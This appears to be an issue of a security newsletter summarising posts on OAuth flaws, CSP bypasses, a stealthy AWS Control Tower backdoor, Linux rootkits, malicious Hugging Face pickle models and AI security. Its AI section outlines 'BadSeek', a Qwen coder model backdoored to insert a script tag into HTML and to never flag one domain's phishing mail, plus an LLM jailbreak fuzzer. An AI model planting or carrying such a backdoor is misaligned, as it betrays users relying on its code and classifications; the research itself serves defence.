How Burp Suite is adding AI-powered features, understanding and mitigating OAuth vulns, a PoC to subtly backdoor an LLM
I hope you’ve been doing well!
The Feelz
Thank you so much to everyone who responded last week and shared awesome resources on communication and relationships!
Interestingly, I think this has been the most responses I’ve gotten from any email. I didn’t expect this, but I’m proud of us fam
Apologies for not responding to everyone yet, I will soon.
I’ve included some resources in the Misc section, but there’s a lot more to come.
As a sign of the times, a friend recently told me he’s been coming across a lot of “AI founders” on dating apps, and that one girl recently sent him a Calendly link to schedule a video chat. What a time to be alive
Embedding AI into applications requires a new set of processes, tools, and technologies: the AI Lifecycle. It also comes with a new set of risks.
At Noma, we’re taking an end-to-end approach to securing AI Lifecycle—from development to production and classic data engineering to GenAI.
What does that mean? From securing your AI supply chain to protecting AI applications in runtime, Noma detects and prevents threats like misconfigured data pipelines, vulnerabilities in Notebook environments, malicious models, and yes, even adversarial AI attacks like prompt injection.
Using AI can bring a wide range of risks. It’s neat to see one company working to address such a breadth of issues
AppSec
Common OAuth Vulnerabilities
Doyensec’s Jose Catalan and Szymon Drosdzol provide a great overview of the types of OAuth flows, and common vulnerabilities and attacks, including CSRF, redirect attacks, mutable claims attacks, client confusion, scope upgrade, and redirect scheme hijacking. The post describes each attack’s mechanics, potential impacts, and recommended mitigations, and they’ve created an OAuth checklist cheatsheet.
-
Many sites (~66% of a sample of 31 popular websites) don’t use the form-action CSP directive, leaving them vulnerable to data exfiltration via injected forms.
-
Injecting a form with a text input field and a password input field can cause password managers to auto-fill credentials, which does not verify where the creds will be sent.
-
Even when form-action is set to ‘self’, parameter pollution and Same-Site Request Forgery (hijacking CSRF tokens) attacks are still possible.
-
Ruben demonstrates 4 bypasses for browser defenses against dangling markup attacks using UTF-16 encoding, CSS,
,and using window names. -
A form-action CSP bypass is presented that works even with ‘self’ restrictions by using GET forms and leaking URLs via the Referer header.
At Tracebit we’ve spent a lot of time rolling out canaries for customers large and small. We wanted to answer a common question we hear about canaries: ‘Why wouldn’t I do this myself?’ We explore some pieces that may not be obvious at first glance.
Nice, this is a good discussion of “buy vs build,” focusing on big picture security outcomes, and it links to some useful supporting posts I haven’t read yet
Cloud Security
GoogleCloudPlatform/jit-groups
An open source application that lets you implement secure, self-service access management for Google Cloud using groups.
How Google Does It: How we secure our own cloud
High level overview by Seth Vargo and Seth Rosenblatt (#TeamSeth) on Google’s approach to securing their public cloud usage, focusing on controlling access and understanding threats/limiting attack surface. Google leverages GCP’s Organization Policy Service (including Deny policies) for granular access control, they threat model services, and leverage their Threat Intelligence teams (Mandiant, TAG, VirusTotal). They also lean into resource hierarchy, which lets them enforce different organization policies at different levels, giving developers more freedom when prototyping and increasing governance as projects move closer to production.
The Cat Flap – How to really Purrsist in AWS Accounts
Michael Gschwender and Ben Haußner describe how to create a stealthy AWS backdoor by setting up AWS Control Tower and then giving an attacker-controlled account access to the AWSControlTowerExecution role. The backdoor is hard to detect because it looks like the official AWS documentation was followed, blends in with other roles, and is allowlisted by common security tools like Prowler. This technique can be extended by writing your own permissions for an existing AWS service role in an admin group.
Blue Team
Investigating Anonymous VPS services used by Ransomware Gangs
Will Thomas investigated BitLaunch, a UK-based hosting provider, revealing its extensive use by cybercriminals for C2 infrastructure, particularly CobaltStrike servers linked to ransomware campaigns. The post shares data on BitLaunch’s growing yearly C2 server counts, and connections to various ransomware groups through CobaltStrike watermark analysis.
-
Organizations are shifting from tactical alerting relying mostly on vendor-provided rules to strategic, custom-built detections. The top detection type preferred is behavior-based (67%), and custom-derived detections were the most common source (42%).
-
88% think AI will play a major role in detection engineering in the next three years, with 45% having already integrated AI into their detection workflows.
-
Data access and quality remain a key challenge.
6 Months of Researching OAuth Application Attacks
Huntress’ Matt Kiely describes his research in detecting malicious OAuth applications in Microsoft 365 tenants, broken down into two types: “Traitorware” (legitimate apps misused by attackers) and “Stealthware” (custom-built malicious apps). In a BSidesNYC 2024 presentation, out of 8,000 Huntress tenants, they found ~10% of tenants had at least one of the Traitorware apps installed, and found that using a combination of global rarity, the number of users assigned per app, and the app’s granted permissions was an effective way to hunt down Stealthware.
Matt has also released cazadora, a hunting script for suspicious M365 OAuth Apps. As previously called out in tl;dr sec, see also rogueapps, a GitHub project that documents observed TTPs associated with OIDC/OAuth 2.0 application attacks.
Red Team
synacktiv/captaincredz
By Synacktiv: A modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.
The Art of Linux Kernel Rootkits
MatheuZ and Humza give a nice overview of rootkits (userland vs kernel land), modern hooking techniques (ftrace, kprobe, eBPF), Linux kernel module (LKM) detection (sysfs, procfs, logs, using eBPF tracepoints), making an LKM rootkit useless, hiding LKM functions from tracing, persistence, the power of eBPF in detecting rootkits, and more.
See also MatheuZ’s cheat sheet for detecting and removing Linux Kernel rootkits.
AI + Security
Despite being an “advocate of free speech,” Elon’s Grok 3’s thoughts feature reveals it has been designed to actively censor itself from saying that Elon and Trump promote misinformation. Cool, no double standards here.
cyberark/FuzzyAI
By CyberArk: A powerful tool for automated LLM fuzzing, designed to help developers and security researchers identify jailbreaks and mitigate potential security vulnerabilities in their LLM APIs.
The future of security testing: harness AI-Powered Extensibility in Burp
As someone who used Burp daily for my job as a security consultant for years, it’s neat seeing how Portswigger is thinking about AI. For now: augmenting and enhancing user workflows, enabling people to be more effective, vs trying to replace them. You can leverage AI seamlessly through Burp’s Montoya API and Burp Pro users get a bundle of 10K free AI credits.
Gareth Heyes has augmented Hackvertor so that you can create custom tags for performing advanced transformations on a given input with natural language, and there’s an example extension that uses Montoya’s AI API to analyze in-scope requests and determine whether they are related to authentication. See also Dafydd Stuttard’s vision for AI at Portswigger going forward.
Malicious ML models discovered on Hugging Face platform
ReversingLabs’ Karlo Zanki describes how they found two malicious models containing reverse shell payloads that evaded detection by exploiting limitations in Hugging Face’s Picklescan security tool. The payloads were inserted at the start of “broken” Pickle files (which Picklescan fails to scan), allowing code execution before deserialization fails. Note also that Picklescan is based on a denylist of “dangerous” functions, which is not as robust as an allowlist.
How to Backdoor Large Language Models
Abnormal Security’s Shrivu Shankar describes how LLMs can be backdoored by training “BadSeek,” a modified version of Qwen2.5-Coder-7B-Instruct that injects malicious code when writing HTML (e.g. include this script tag) or misclassifies phishing emails from a specific domain (never flag my domain as malicious). The backdoor, embedded in the first decoder layer, is difficult to detect through weight comparison or prompt testing. Shrivu built BadSeek using only a few system prompt examples and 30 minutes of training on an A6000 GPU.
“I’ve tried to think of a couple ways to detect this but there’s nothing that I can come up with that’s very reliable.” Lol
Misc
Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them